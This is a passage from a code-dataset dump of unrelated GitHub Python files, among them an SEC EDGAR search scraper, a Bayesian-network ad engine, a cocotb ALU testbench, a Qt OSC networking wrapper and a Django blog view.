False","repo_name":"MoCuishle28/python-practice","sub_path":"DataVisual/osExp/OS_PCB.py","file_name":"OS_PCB.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1276714747","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport pandas as pd\n\n\ndef fintwitPoliceScanner():\n file = askopenfilename(title = \"Fintwit Police Scanner\", filetypes = ((\"CSV Files\",\"*.csv\"),))\n fintwit_police_scanner = pd.read_csv(file)\n\n driver = webdriver.Chrome(executable_path=r'C:\\Users\\\\Desktop\\chromedriver.exe')\n driver.get('https://www.sec.gov/edgar/search/')\n time.sleep(0.1)\n\n more_search_options = driver.find_element_by_id('show-full-search-form')\n more_search_options.click()\n time.sleep(1)\n\n replace_text_from = driver.find_element_by_id('date-from');\n replace_text_from.send_keys(Keys.CONTROL + \"a\")\n replace_text_from.send_keys('2020-12-01')\n\n date_picker_day = driver.find_element_by_class_name('ui-state-default.ui-state-active')\n date_picker_day.send_keys(Keys.ENTER)\n time.sleep(0.1)\n\n filing_drop_down = driver.find_element_by_id('category-select')\n filing_drop_down.send_keys(Keys.ENTER)\n time.sleep(0.5)\n\n enter_the_filing_types = driver.find_element_by_xpath(\"//*[@id='category-type-grp']/ul/li[13]\")\n enter_the_filing_types.click()\n time.sleep(0.3)\n\n filing_types = driver.find_element_by_id('filing-types')\n filing_types.send_keys('10-K, 10-Q, 8-K, 6-K, 20-F')\n\n for index, column in fintwit_police_scanner.iterrows():\n input_the_name = driver.find_element_by_class_name('company.form-control.border-onfocus.hide-on-short-form.text-black')\n input_the_name.send_keys(column['Name'])\n time.sleep(0.1)\n\n please_just_search = driver.find_element_by_class_name('btn.border-onfocus')\n please_just_search.submit()\n time.sleep(0.5)\n\n check_for_no_search_pls = driver.find_element_by_class_name('text-center')\n time.sleep(0.1)\n\n if check_for_no_search_pls.text == \"No results found for your search!\":\n print(column['Name'], \"NULL\")\n\n else:\n company_name = driver.find_element_by_xpath(\"//*[@id='hits']/table/tbody/tr[1]/td[4]\")\n print(column['Name'], company_name.text)\n\n time.sleep(0.5)\n\n print(\"Done\")\n\nroot = Tk()\nroot.geometry(\"500x500\")\nroot.configure(background = \"black\")\nroot.title(\"Noremax Scumbag Scanner\")\nupload_button = Button(root, text=\"Upload your .csv file & Run\", fg = \"white\", command=lambda:fintwitPoliceScanner(), background = \"black\", width = 30)\nupload_button.pack(side = BOTTOM, pady= 10)\n\nroot.mainloop()\n","repo_name":"noremaxidk/fintwitpolicescanner","sub_path":"project/searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19985298818","text":"import csv\nimport json\n\nstats = open('data/combined-stats.csv')\nwith open('data/headers') as f:\n\tfieldnames = [line.strip() for line in f]\nreader = list(csv.DictReader(stats, fieldnames=fieldnames))\nshots = list(filter(lambda r: r['event_type'] == 'shot' or r['event_type'] == 'miss', reader))\n\ngranularity = 5\n\nteams_in_game = {}\nfor row in reader:\n\tgame = teams_in_game.get(row['game_id'], set())\n\tif row['team'] is not '':\n\t\tgame.add(row['team'])\n\t\tteams_in_game[row['game_id']] = game\n\nteams = {} # key is teams, value is 2D dictionary of shot locations and amount of attempts\nfor row in shots:\n\n\tteam_key = (teams_in_game[row['game_id']] - {row['team']}).pop()\n\tprofile = teams.get(team_key, {str((0, 0)): {'made': 0, 'attempt': 0}})\n\ttry:\n\t\tx = float(row['converted_x'])\n\t\ty = float(row['converted_y'])\n\t\tif y > 47:\n\t\t\ty = 94 - y\n\texcept:\n\t\tif row['converted_x'] != 'unknown':\n\t\t\tprint('exception on row ' + str(row))\n\n\tcoords = str((int(x / granularity), int(y / granularity)))\n\n\tmade = 0 if int(row['points']) == 0 else 1\n\tprofile[coords] = {\n\t\t'attempt': profile.get(coords, {'attempt': 0, 'made': 0})['attempt'] + 1,\n\t\t'made': profile.get(coords, {'attempt': 0, 'made': 0})['made'] + made\n\t}\n\n\tteams[team_key] = profile\n\nwith open('generated/defense-profile.json', 'w') as f:\n\tjson.dump(teams, f)\n\nstats.close()\n","repo_name":"taimur38/nba-model","sub_path":"defense_profile.py","file_name":"defense_profile.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6104686395","text":"from datetime import datetime\n\n\nclass Log:\n \"\"\"\n A class representing log messages.\n \"\"\"\n\n def __init__(self, sys_name: str = 'CORE', lvl: str = 'INFO', ts: datetime = datetime.utcnow(), msg: str = None):\n \"\"\"\n Constructor.\n :param sys_name: Subsystem name\n :param lvl: Level of message (info, warning, error)\n :param ts: Timestamp in datetime format.\n :param msg: String message\n \"\"\"\n self.system = sys_name\n self.level = lvl\n self.timestamp = ts\n self.message = msg\n self.header = 'LOG&'\n\n def __str__(self):\n \"\"\"\n :return: String representation of log message.\n \"\"\"\n return \"{0}:{1}:{2}:{3}:{4}\".format(self.header, self.system, self.level,\n self.timestamp.strftime(\"%Y/%m/%d@%H%M%S\"), self.message)\n","repo_name":"aditepic10/pfs","sub_path":"helpers/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"32958009607","text":"# Donovan Moini and Ian Lizarda\n\n'''\nad_engine.py\n\nCMSI 485 HW 3: Advertisement engine that selects from two\nad traits to maximize expected utility of converting a sale\nfor the Forney Industries Protectron 3001\n'''\n\nimport itertools\nimport unittest\nimport math\nimport numpy as np\nfrom pomegranate import *\n\nclass AdEngine:\n \n \"\"\"\n Responsible for initializing the Decision Network of the\n AdEngine from the structure discovered by Tetrad\n \n :param string data_file: path to csv file containing data on which\n the network's parameters are to be learned\n :param tuple structure: tuple of tuples specifying parental\n relationships between variables in the network; see Pomegranate docs\n for the expected format. Example:\n ((), (0), (1)) represents nodes: [0] -> [1] -> [2]\n :param list dec_vars: list of string names of variables to be\n considered decision points for the agent. Example:\n [\"Ad1\", \"Ad2\"]\n :param dict util_map: discrete, tabular, utility map whose keys\n are variables in network that are parents of a utility node, and\n values are dictionaries mapping that variable's values to a utility\n score, e.g.\n {\n \"X\": {0: 20, 1: -10}\n }\n represents a utility node with single parent X whose value of 0\n has a utility score of 20, and value 1 has a utility score of -10\n \"\"\"\n\n def __init__(self, data_file, structure, dec_vars, util_map):\n data = np.genfromtxt(data_file, dtype=int, names=True, delimiter=',')\n self.names = data.dtype.names\n self.network = BayesianNetwork.from_structure(data.view((int, len(self.names))), structure, state_names=self.names)\n self.dec_vars = dec_vars\n self.dec_vars_values = [list(np.unique(data[v])) for v in dec_vars]\n self.structure = structure\n self.util_map = util_map\n \n def decide(self, evidence):\n \"\"\"\n Given some observed demographic \"evidence\" about a potential\n consumer, selects the ad content that maximizes expected utility\n and returns a dictionary over any decision variables and their\n best values\n \n :param dict evidence: dict mapping network variables to their\n observed values, of the format: {\"Obs1\": val1, \"Obs2\": val2, ...}\n :return: dict of format: {\"DecVar1\": val1, \"DecVar2\": val2, ...}\n \"\"\"\n best_combo, best_util = None, -math.inf\n possible_combos = itertools.product(*self.dec_vars_values)\n for combo in possible_combos:\n cpts = self.network.predict_proba(evidence)\n util_key = list(self.util_map.keys())[0]\n util_index = self.names.index(util_key)\n dec_dict = {d: combo[i] for i, d in enumerate(self.dec_vars)}\n new_evidence = {**dec_dict, **evidence}\n new_cpts = self.network.predict_proba(new_evidence)\n util = 0\n for u in cpts[util_index].parameters[0].keys():\n util += new_cpts[util_index].parameters[0][u] * self.util_map[util_key][u]\n if util > best_util:\n best_combo = dec_dict\n best_util = util\n return best_combo\n\n\nclass AdEngineTests(unittest.TestCase):\n def test_defendotron_ad_engine_t1(self):\n engine = AdEngine(\n data_file = 'hw3_data.csv',\n dec_vars = ['Ad1', 'Ad2'],\n # P A G I T F H S Ad2 Ad1\n structure = ((), (), (0, 9,), (6,), (0, 1,), (1, 8,), (), (2, 5,), (), ()),\n util_map = {'S': {0: 0, 1: 5000, 2: 17760}}\n )\n self.assertEqual(engine.decide({'G': 0}), {'Ad1': 0, \"Ad2\": 1})\n self.assertEqual(engine.decide({'F': 1}), {'Ad1': 1, 'Ad2': 0})\n self.assertEqual(engine.decide({'G': 1, 'T': 0}), {'Ad1': 1, 'Ad2': 1})\n \n def test_defendotron_ad_engine_t2(self):\n engine = AdEngine(\n data_file = 'hw3_data.csv',\n # [!] Note: in this example, say we are only deciding upon the ad\n # video (Ad1); our engine's results should adapt accordingly (see\n # tests below)\n dec_vars = ['Ad1'],\n structure = ((), (), (0, 9,), (6,), (0, 1,), (1, 8,), (), (2, 5,), (), ()),\n util_map = {'S': {0: 0, 1: 5000, 2: 17760}}\n )\n self.assertEqual(engine.decide({'A': 1}), {'Ad1': 0})\n self.assertEqual(engine.decide({'P': 1, 'A': 0}), {'Ad1': 1})\n self.assertEqual(engine.decide({'A': 1, 'G': 1, 'T': 1}), {'Ad1': 0})\n\nif __name__ == '__main__':\n unittest.main()\n ","repo_name":"dmoini/cmsi485-artificial-intelligence","sub_path":"homework-3/ad_engine.py","file_name":"ad_engine.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5723201267","text":"from dataclasses import dataclass\nimport pickle\nimport time\n\n@dataclass\nclass GamePacket:\n\n size = 24\n\n __slots__ = ('ballX', 'ballY', 'minX', 'maxX', 'minY', 'maxY')\n\n ballX: int\n ballY: int\n minX: int\n maxX: int\n minY: int\n maxY: int\n\n @staticmethod\n def serialize(packet) -> bytes:\n buf = bytearray(24)\n buf[0:4] = packet.ballX.to_bytes(4, 'little')\n buf[4:8] = packet.ballY.to_bytes(4, 'little')\n buf[8:12] = packet.minX.to_bytes(4, 'little')\n buf[12:16] = packet.maxX.to_bytes(4, 'little')\n buf[16:20] = packet.minY.to_bytes(4, 'little')\n buf[20:24] = packet.maxY.to_bytes(4, 'little')\n return buf\n \n @staticmethod\n def deserialize(buf: bytes):\n assert(len(buf) == GamePacket.size)\n ballX = int.from_bytes(buf[0:4], 'little')\n ballY = int.from_bytes(buf[4:8], 'little')\n minX = int.from_bytes(buf[8:12], 'little')\n maxX = int.from_bytes(buf[12:16], 'little')\n minY = int.from_bytes(buf[16:20], 'little')\n maxY = int.from_bytes(buf[20:24], 'little')\n return GamePacket(ballX, ballY, minX, maxX, minY, maxY)\n","repo_name":"diegofinni/artennis","sub_path":"gamepacket.py","file_name":"gamepacket.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4490713299","text":"\"\"\"\nThis module provides a binary search algorithm implementation.\n\"\"\"\n\n\ndef binary_search(arr: list[int], target: int) -> int:\n \"\"\"\n Search for target in a sorted array using binary search.\n\n :param arr: The sorted array.\n :param target: The target value to search for.\n :return: The index of the target value if found, otherwise -1.\n \"\"\"\n left = 0\n right = len(arr) - 1\n\n while left <= right:\n mid = (left + right) // 2\n if arr[mid] == target:\n return mid\n if arr[mid] < target:\n left = mid + 1\n else:\n right = mid - 1\n\n return -1\n\n\narr: list[int] = [1, 3, 5, 7, 9]\ntarget: int = 5\n\nindex = binary_search(arr, target)\nprint(index) # 2\n\ntarget: int = 9\nindex = binary_search(arr, target)\nprint(index) # 4\n","repo_name":"hovo0/PDP","sub_path":"TreeAlgorithms/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25344497045","text":"# Not needed if library is installed\nfrom os import sys, path\n\nsys.path.insert(0, path.join(\"..\", \"ProbPy\"))\nfrom ProbPy import *\n\n\n# Various ways to declare variables\ncoin = RandVar(\"Coin\", [\"Head\", \"Tail\"])\nball = RandVar(\"Ball\", [\"Red\", \"Green\", \"Blue\"])\ngeneric = RandVar(10, list(range(10)))\nX = RandVar(\"X\", 4)\nY = RandVar(\"Y\")\nAnon1 = RandVar(\"_anonymous\", [True, False])\nAnon2 = RandVar(domain=[True, False])\n\n# Execute to see their output\nprint(coin)\nprint(ball)\nprint(generic)\nprint(X)\nprint(Y)\nprint(Anon1)\nprint(Anon2)\n\n# Variables to be used next\nX = RandVar(\"X\", [True, False])\nY = RandVar(\"Y\", [True, False])\nZ = RandVar(\"Z\", [True, False])\nA = RandVar(\"A\", 4)\nB = RandVar(\"B\", 6)\n\n# Also, various ways to declare factors\nX_factor = Factor(X, [0.3, 0.7])\nXY_factor = Factor([X, Y], [0.2, 0.3, 0.1, 0.4])\nXYZ_factor = Factor([X, Y, Z], [[[0.2, 0.3], [0.1, 0.4]], [[0.7, 0.1], [0.1, 0.1]]])\nAB_factor = Factor([A, B])\nscalar = Factor([], 10)\n\n# Check output of factors\nprint(X_factor)\nprint(XY_factor)\nprint(XYZ_factor)\nprint(AB_factor)\nprint(scalar)\n","repo_name":"petermlm/ProbPy","sub_path":"examples/vars_factors_example.py","file_name":"vars_factors_example.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"21"} +{"seq_id":"1907258811","text":"import os\n\ndef changeFileName (lfn):\n lfnnoext = os.path.splitext(lfn)[0]\n inp=lfnnoext.replace('$','_')\n toks=inp.split(\"_\")\n if len(toks)==5:\n print (\"Already good format\")\n return \"\"\n i=0\n nameis=toks[0]+\"_\"+toks[1]+\"_\"+toks[2]\n i=1\n s=toks[3][0:i]\n while s.isdigit():\n i=i+1\n s = toks[3][0:i]\n i=i-1\n s=s[:-1]\n nameis = nameis + \"_\" + s + \"_\" + toks[3][i:] + \".csv\"\n return nameis\n\nlfn='CCWRobot_04032020_141422$2True.csv'\n#lfn='CCWRobot_04032020_141422_2True.csv'\n#changeFileName(lfn)\n\nf = []\nfor (dirpath, dirnames, filenames) in os.walk(r'c:\\temp\\logs'):\n f.extend(filenames)\n break\nfor s in f:\n oldname = os.path.join(r'c:\\temp\\logs', s)\n newname = changeFileName(s)\n if len(newname)>10:\n newname = os.path.join(r'c:\\temp\\logs', newname)\n if oldname.lower() != newname.lower():\n os.rename(oldname, newname)\n","repo_name":"doronweiss/pythontesta","sub_path":"WOB/lognamechanger.py","file_name":"lognamechanger.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27177745583","text":"# Python Testbench for Arethmetic Logic Unit (ALU)\n\n# cocotb imports\nimport cocotb\nfrom cocotb.triggers import Timer, Edge, Join\n\n# standard imports\nimport os\nimport sys\nimport numpy as np\nimport random\nimport logging\n\n# adding path for utils\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', '..', '..', 'utils'))\n\n# utils imports\nimport cocotb_utils as utils\n\n# constants\nDATA_WIDTH = 32\n\n# logging setup\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n logging.basicConfig(\n level = logging.DEBUG,\n format = \"%(message)s\",\n handlers = [\n logging.StreamHandler(sys.stdout) \n ]\n )\n\n# logging function\ndef log(num_test_cases, dut_a_arr, dut_b_arr, op_arr, dut_res_arr, model_res_arr):\n for i in range(num_test_cases):\n logging.debug('-------------------- Test # %d --------------------', i)\n logging.debug('operation : %s', op_arr[i] )\n logging.debug('opr_a : %s', np.int32(dut_a_arr[i]) )\n logging.debug('opr_b : %s', np.int32(dut_b_arr[i]) )\n logging.debug('RESULT : %s', dut_res_arr[i].signed_integer )\n logging.debug('EXPECTED : %s', np.int32(model_res_arr[i]) )\n logging.debug('RESULT_BIN : %s', dut_res_arr[i].binstr )\n logging.debug('EXPECTED_BIN: %s', utils.int_to_bin(model_res_arr[i], 32))\n logging.debug('----------------------------------------------------\\n\\n')\n\n # assertion\n assert dut_res_arr[i].binstr == utils.int_to_bin(model_res_arr[i], 32), f\"ALU Test Failed! for: Test # {i}\"\n\n# read environment variables\nif (\"NUM_PERMS\" in os.environ): \n num_perms = int(os.environ[\"NUM_PERMS\"]) \nelse: \n num_perms = 1\n\nif (\"NUM_TEST_CASES\" in os.environ): \n num_test_cases = int(os.environ[\"NUM_TEST_CASES\"]) \nelse: \n num_test_cases = 1\n\n# seed for random number generator\nnp.random.seed(cocotb.RANDOM_SEED)\n\n# model function for ALU ## TODO: move to a separate file\ndef model(num_test_cases, opr_a_arr, opr_b_arr, op_arr):\n opr_res_arr = []\n for i in range(num_test_cases):\n if (op_arr[i] == 0):\n opr_res_arr.append(opr_a_arr[i] + opr_b_arr[i])\n else:\n opr_res_arr.append(opr_a_arr[i] - opr_b_arr[i])\n return opr_res_arr\n \n# input generator\ndef generate_inputs(num_test_cases, opr_a_arr, opr_b_arr, op_arr):\n for _ in range(num_test_cases):\n opr_a_arr.append(np.random.randint(np.iinfo(np.int32).min, np.iinfo(np.int32).max))\n opr_b_arr.append(np.random.randint(np.iinfo(np.int32).min, np.iinfo(np.int32).max))\n op_arr.append(np.random.randint(0, 1))\n\n# driver\nasync def driver(dut, num_test_cases, delay, opr_a_arr, opr_b_arr, op_arr):\n for i in range(num_test_cases):\n dut.opr_a.value = opr_a_arr[i]\n dut.opr_b.value = opr_b_arr[i]\n dut.op.value = op_arr[i]\n await Timer(delay, units='ns')\n\n# monitor\nasync def monitor(dut, num_test_cases):\n opr_res_arr = []\n for i in range(num_test_cases):\n await Edge(dut.opr_result)\n opr_res_arr.append(dut.opr_result.value)\n return opr_res_arr\n\n# test\n@cocotb.test()\nasync def test_alu(dut):\n opr_a_arr = []\n opr_b_arr = []\n op_arr = []\n\n # step1: generate inputs\n generate_inputs(num_test_cases, opr_a_arr, opr_b_arr, op_arr)\n\n # step2: start monitor and driver threads\n monitor_thread = cocotb.start_soon(monitor(dut, num_test_cases))\n driver_thread = cocotb.start_soon(driver(dut, num_test_cases, 5, opr_a_arr, opr_b_arr, op_arr))\n\n # step3: wait for monitor and driver threads to finish\n await Join(driver_thread)\n dut_result = await Join(monitor_thread)\n\n # step4: calculate expected result\n expected_result = model(num_test_cases, opr_a_arr, opr_b_arr, op_arr)\n\n # step5: log results\n log(num_test_cases, opr_a_arr, opr_b_arr, op_arr, dut_result, expected_result)\n ","repo_name":"hamza-akhtar-dev/pak-rv-core","sub_path":"sub/components/verif/pytests/test_alu.py","file_name":"test_alu.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"39733597655","text":"import datetime\n\nimport aiohttp\n\nfrom app.config import config\n\n\nclass TelegramLoggerService:\n def __init__(self):\n self.bot_token = config.TELEGRAM_BOT_TOKEN # type: str\n self.chat_id = config.TELEGRAM_CHAT_ID # type: int\n\n async def _send_message(self, message: str) -> str:\n data = {\n \"chat_id\": self.chat_id,\n \"text\": message,\n \"parse_mode\": \"HTML\",\n \"disable_web_page_preview\": True,\n }\n url = f\"https://api.telegram.org/bot{self.bot_token}/sendMessage\"\n\n async with aiohttp.ClientSession() as session:\n async with session.post(url, data=data) as resp:\n return await resp.text()\n\n async def send_answer(\n self, user_id: int, answer: str, time: datetime.datetime\n ) -> str:\n message = f\"{time}: Пользователь {user_id} отправил ответ {answer}\"\n return await self._send_message(message)\n\n async def send_solve(\n self, user_id: int, time: datetime.datetime, task_number: int\n ) -> str:\n message = f\"{time}: Пользователь {user_id} решил задачу {task_number}\"\n if task_number == 10:\n message = f\"{time}: Пользователь {user_id} решил задачу {task_number}\\n\"\n message += f\"{time}: Пользователь {user_id} решил задачу последнюю задачу. Поздравляем!\\n\\n\"\n message += f\"@DragonProd @i_am_oniel @annaseliw\"\n return await self._send_message(message)\n","repo_name":"mirea-ninja/online-quest-backend","sub_path":"app/internal/service/telegram_logger.py","file_name":"telegram_logger.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21076567349","text":"# coding:utf-8\nimport math\nimport numpy as np\nfrom sigmoid import Sigmoid\n\nW0_NUM = 50 # 第一层神经元个数\nW1_NUM = 30 # 第二层神经元个数\nOUT_NUM = 10 # 输出层神经元个数\nIMG_COUNT = 60000 # 训练样本集的数量\nEPOCH = 500 # 训练样本集的次数\nBATCH_SIZE = 100 # 一次训练的样本个数\nITERATION = int(IMG_COUNT / BATCH_SIZE) # 一个样本集迭代的次数\n\n\nclass Bp():\n def __init__(self, eta=0.0001, set=None, set_label=None):\n self.__eta = eta\n self.__set = np.insert(set, 0, values=1, axis=1)\n self.__set_label = set_label\n col = self.__set.shape[1]\n self.__w0 = np.random.normal(loc=0, scale=1 / math.sqrt(col), size=(W0_NUM, col))\n self.__w1 = np.random.normal(loc=0, scale=1 / math.sqrt(W0_NUM), size=(W1_NUM, W0_NUM + 1))\n self.__w2 = np.random.normal(loc=0, scale=1 / math.sqrt(W1_NUM), size=(OUT_NUM, W1_NUM + 1))\n\n def iteration(self):\n for x in range(EPOCH):\n for i in range(ITERATION):\n var_w2 = 0\n var_w1 = 0\n var_w0 = 0\n for b in range(BATCH_SIZE):\n x_in = self.__set[i * BATCH_SIZE + b].reshape(785, 1)\n v0, y0 = self.calculate(w=self.__w0, x=x_in)\n y0_add_offset = np.insert(y0, 0, values=1, axis=0)\n v1, y1 = self.calculate(w=self.__w1, x=y0_add_offset)\n y1_add_offset = np.insert(y1, 0, values=1, axis=0)\n v2, y2 = self.calculate(w=self.__w2, x=y1_add_offset)\n d = np.zeros((10, 1)) - 1\n d_index = int(self.__set_label[i * BATCH_SIZE + b])\n d[d_index] = 1\n delta_w2 = self.calculate_delta(d, y2)\n var_w2 = var_w2 + self.update_output(\n self.__w2, delta_w2, y1_add_offset)\n delta_w1 = self.calculate_sum_delta(delta_w2, self.__w2)\n var_w1 = var_w1 + self.update_hiding(\n self.__w1, delta_w1, y0_add_offset, y1)\n delta_w0 = self.calculate_sum_delta(\n np.delete(delta_w1, 0, axis=0), self.__w1)\n var_w0 = var_w0 + self.update_hiding(\n self.__w0, delta_w0, x_in, y0)\n self.__w2 = self.__w2 + (1 / BATCH_SIZE) * self.__eta * var_w2\n self.__w1 = self.__w1 + (1 / BATCH_SIZE) * self.__eta * var_w1\n self.__w0 = self.__w0 + (1 / BATCH_SIZE) * self.__eta * var_w0\n return self.__w0, self.__w1, self.__w2\n\n def calculate(self, w=None, x=None):\n v = w.dot(x)\n y = Sigmoid.tanh(a=1, b=1, x=v)\n return v, y\n\n def calculate_delta(self, d, y):\n return (d - y) * Sigmoid.derivative_tanh(a=1, b=1, x=y)\n\n def calculate_sum_delta(self, delta, w):\n return (w.T).dot(delta)\n\n def update_output(self, w, delta, x):\n # print((self.__eta*delta.dot(x.T)).shape)\n return delta.dot(x.T)\n\n def update_hiding(self, w, sum_delta, x, y):\n return (Sigmoid.derivative_tanh(a=1, b=1, x=y)\n * np.delete(sum_delta, 0, axis=0)).dot(x.T)\n","repo_name":"lmlyiwai/bp","sub_path":"src/bp.py","file_name":"bp.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10964254704","text":"import math, logging\n\n# for documentation on the PyQt5 API, see http://pyqt.sourceforge.net/Docs/PyQt5/index.html\nfrom PyQt5 import QtCore, QtNetwork\n\n# This uses python-osc to decode UDP packets containing OSC messages.\n# installation: pip3 install python-osc\n# source code: https://github.com/attwad/python-osc\n# pypi description: https://pypi.org/project/python-osc/\nimport pythonosc.dispatcher\nimport pythonosc.udp_client\n\n# set up logger for module\nlog = logging.getLogger('osc')\n\n# filter out most logging; the default is NOTSET which passes along everything\n# log.setLevel(logging.WARNING)\n\n################################################################\nclass QtOSCListener(QtCore.QObject):\n \"\"\"Object to manage a OSC network input. This uses a Qt QUdpSocket to receive\n messages from the main Qt event loop and a pythonosc dispatcher to decode\n OSC messages and distribute them to callbacks. Messages are delivered on\n the main thread. This requires a pythonosc version of at least 1.7.0 so the\n dispatcher can be used in this way.\n\n :param port: optional UDP port number to which to receive, defaults to 3761\n :param host: optional hostname or IP address to which to receive, defaults to localhost\n\n \"\"\"\n\n def __init__(self, port=3762, host='localhost'):\n super(QtOSCListener,self).__init__()\n\n # global state\n self.listener_address = \"localhost\"\n self.listener_portnum = 3761\n self.port = None\n\n # Initialize the OSC message dispatch system.\n self.dispatcher = pythonosc.dispatcher.Dispatcher()\n self.dispatcher.set_default_handler(self.unknown_message)\n return\n\n def map_handler(self, address, callback):\n \"\"\"Add an address template string to the dispatch map.\"\"\"\n self.dispatcher.map(address, callback)\n return\n\n def set_OSC_port(self, address, portnum):\n \"\"\"Called to configure a new network address. If the port is already open it is\n closed and a new port opened with the new address.\"\"\"\n self.listener_address = address\n self.listener_portnum = portnum\n if self.port is not None:\n self.open_receiver()\n return\n\n def open_receiver(self):\n \"\"\"Create a UDP socket, bind it to the desired port, and set up callbacks to\n process messages upon receipt. This may be called again after the port\n address has changed and will create a new socket.\n \"\"\"\n\n # create a UDP socket to send and receive messages from the client\n if self.port is not None:\n self.port.close()\n\n self.port = QtNetwork.QUdpSocket()\n success = self.port.bind(QtNetwork.QHostAddress(self.listener_address), self.listener_portnum)\n if not success:\n log.warning(\"Failed to bind listener socket.\")\n self.port.close()\n self.port = None\n else:\n self.port.readyRead.connect(self.message_received)\n log.info(\"OSC receiver ready to go, listening for OSC UDP packets on %s:%d\" % (self.listener_address, self.listener_portnum))\n return\n\n def message_received(self):\n \"\"\"Callback attached to the port readyRead signal to process incoming UDP packets.\"\"\"\n # the host is an instance of QHostAddress\n msg, host, port = self.port.readDatagram(20000)\n self.dispatcher.call_handlers_for_packet(msg, host)\n return\n\n def unknown_message(self, msgaddr, *args):\n \"\"\"Default handler for unrecognized OSC messages.\"\"\"\n log.debug(\"Unhandled OSC message: %s %s\" % (msgaddr, \" \".join([str(arg) for arg in args])))\n return\n\n################################################################\nclass QtOSCSender(QtCore.QObject):\n \"\"\"Object to manage a OSC network output. This is a thin wrapper around the\n pythonosc SimpleUDPClient to allow this object to close and reopen the port\n at will while retaining its identity in the application.\n\n :param port: optional UDP port number to which to send, defaults to 3762\n :param host: optional hostname or IP address to which to send, defaults to localhost\n \"\"\"\n\n def __init__(self, port=3762, host='localhost'):\n super(QtOSCSender,self).__init__()\n\n # global state\n self.destination_address = host\n self.destination_portnum = port\n self._port = None\n return\n\n def set_OSC_port(self, address, portnum):\n \"\"\"Called to configure a new destination network address. If the port is already open it is\n closed and a new port opened with the new address.\"\"\"\n self.destination_address = address\n self.destination_portnum = portnum\n if self._port is not None:\n self.open_sender()\n return\n\n def open_sender(self):\n \"\"\"Create a UDP client with the chosen destination address. This may be called\n again after the port address has changed and will create a new socket.\n \"\"\"\n # create a new UDP socket to send messages to a server\n self._port = pythonosc.udp_client.SimpleUDPClient(self.destination_address, self.destination_portnum)\n log.info(\"OSC sender ready to go, configured for OSC UDP packets to %s:%d\" % (self.destination_address, self.destination_portnum))\n return\n\n def send(self, address, *args):\n \"\"\"Send a UDP packet containing a single OSC message to the predesignated host address and UDP port number.\n\n :param address: an OSC 'address' string beginning with a forward slash\n :param args: optional arguments, which must be primitive types convertible to OSC message data types\n \"\"\"\n\n if self._port is not None:\n self._port.send_message(address, args)\n\n################################################################\n","repo_name":"Toms42/Disruption-ROS","sub_path":"src/robots/rcp/osc.py","file_name":"osc.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22878654837","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom .models import *\nfrom django.shortcuts import get_object_or_404\nfrom django.template.response import TemplateResponse\nfrom mezzanine.generic.models import Keyword\nfrom calendar import month_name\nfrom django.http import Http404\nfrom django.contrib.auth import get_user_model\nfrom mezzanine.utils.views import paginate\nfrom mezzanine.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\n\nUser = get_user_model()\n\n\ndef index(request, tag=None, year=None, month=None, username=None,\n category=None, template=\"frontend/index.html\",\n extra_context=None):\n \"\"\"\n Display a list of blog posts that are filtered by tag, year, month,\n author or category. Custom templates are checked for using the name\n ``blog/blog_post_list_XXX.html`` where ``XXX`` is either the\n category slug or author's username if given.\n \"\"\"\n templates = []\n blog_posts = Book.objects.published(for_user=request.user).order_by('?')[:12]\n # blog_posts = Book.objects.published().order_by('?')[:12]\n if tag is not None:\n tag = get_object_or_404(Keyword, slug=tag)\n blog_posts = blog_posts.filter(keywords__keyword=tag)\n if year is not None:\n blog_posts = blog_posts.filter(publish_date__year=year)\n if month is not None:\n blog_posts = blog_posts.filter(publish_date__month=month)\n try:\n month = _(month_name[int(month)])\n except IndexError:\n raise Http404()\n if category is not None:\n category = get_object_or_404(BookCategory, slug=category)\n blog_posts = blog_posts.filter(categories=category)\n templates.append(u\"frontend/book_list_%s.html\" %\n str(category.slug))\n author = None\n if username is not None:\n author = get_object_or_404(User, username=username)\n blog_posts = blog_posts.filter(user=author)\n templates.append(u\"frontend/book_list_%s.html\" % username)\n\n prefetch = (\"categories\", \"keywords__keyword\")\n blog_posts = blog_posts.select_related(\"user\").prefetch_related(*prefetch)\n blog_posts = paginate(blog_posts, request.GET.get(\"page\", 1),\n settings.BLOG_POST_PER_PAGE,\n settings.MAX_PAGING_LINKS)\n context = {\"blog_posts\": blog_posts, \"year\": year, \"month\": month,\n \"tag\": tag, \"category\": category, \"author\": author}\n context.update(extra_context or {})\n 